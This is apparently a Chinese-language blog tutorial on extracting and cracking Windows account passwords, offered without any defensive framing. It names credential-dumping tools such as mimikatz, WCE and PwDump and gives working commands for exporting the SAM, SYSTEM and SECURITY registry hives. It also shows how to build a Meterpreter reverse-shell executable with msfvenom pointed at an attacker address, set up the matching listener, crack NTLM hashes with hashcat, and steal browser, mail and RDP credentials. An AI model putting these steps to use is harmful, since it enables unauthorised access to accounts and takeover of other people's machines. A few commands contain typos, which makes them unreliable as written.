本文只是简单的讲明密码获取和破解
具体的操作细节均以模糊或具体代码混淆等方式避开
如有兴趣请自行研究,本文不做细说~~~
获取思路:
Windows密码一般是以“哈希值”进行加密保存,我们获取破解密码哈希值就可以获得密码了~
- 通过0day直接获得权限;通过工具(WCE)或者漏洞(MS08-067溢出获得system权限)
- 内网环境下通过嗅探扫描探测,暴力破解获取系统密码
- 本地直接获得密码(读取系统system文件下的config所有文件逐一分析)
密码获取工具:
gethash、gsecdump、Quarks PwDump、Pwdump、mimikatz、WCE……
Quarks PwDump:
是一款Windows下用户密码提取的开源工具,可以抓取Windows平台下多种类型的用户凭证,包括本地账户、域账户、缓存的域账户和Bitlocker的提取。
Quarks PwDump -dh1 // 导出本地哈希值 Quarks PwDump -dhdc // 导出内存中域账户哈希值 Quarks PwDump -dhd // 导出域哈希值(指定NTDS文件)
WCE:
是一款功能强大的Windows平台的内网渗透工具,可以列举登录会话,并且可以添加、变更、删除相关的凭证数据。是内网渗透的必备工具之一
wce -a //获取所有账户哈希值
reg命令:导出密码文件
通过执行reg命令将SAM、System、SECURITY等文件内容导出到文件中
reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security security.hive
命令执行后将会将文件保存在本地~
PowerShell获取:
PowerShell加载mimikatz模块获取密码,通过执行该ps脚本即可获取Windows密码
MSF反弹hashdump及mimikatz获取:
通过MSF生成反弹shell或直接溢出获取反弹shell,在MSF下执行hashdump即可~
- 生成反弹木马:
> msfvenom -p windows/metpreter/reverse_tcp LHOST=192.168.2.196 LPORT=443 -f exe -o met.exe
- MSF使用反弹处理模块
> use exploit/multi/handler > set PAYLOAD windows/meterpreter/reverse_tcp > set LHOST 192.168.2.0 > set LPORT 443 > exploit
- 提权操作……
其它小工具
下列小工具在Windows平台运行就会获得相关的用户凭证……
mailpv:获取mail密码
mspass:获取MSN密码
pst_password:获取Outlook密码
IE PV:获取IE浏览器缓存密码
各类浏览器密码获取工具
passwordfox:获取Firefox浏览器凭证
chromepass:获取谷歌浏览器凭证
无线网络密码获取工具
远程桌面密码获取:
rdpv —— cmdkey/list —— netpass.exe
破解密码哈希值
在线破解:
- CMD5官网
- ophCrack在线破解
ophcrack破解:
导入哈希值,加载Tables,执行Crack~
hashcat破解:
最流行的、最快的密码破解工具
破解:
将准备好的字典password.lst和需要破解的哈希值文件win.hast,复制到hashcat32程序文件夹下,执行命令破解:
hashcat -m 1000 -a 0 -o winpassok.txt win.hash password.lst --username
-m 1000 表示破解密码类型为NTLM
-a 0 表示采用字典破解
-o [feilname].txt 表示将破解后的文件输出到指定的文件中
--remove win.hash 表示从win.hash移除破解成功的hash,密码中有username不能与remove参数同时使用,也可以单一破解
password.lst 密码字典文件
物理获取密码
获取SAM和SYSTEM文件
文件通常在C:\Windows\System32\config目录下存放(通常会使用系统盘PE系统进入并拿走文件),找到文件并拷贝:SAM SYSTEM SECURITY 三个文件
导入文件
使用SAMInside软件将三个文件导入到软件中,之后软件就会告知Hash值~
破解哈希密码
导出需要破解的哈希密码值,赋值拷贝到ophcrack软件中进行破解
,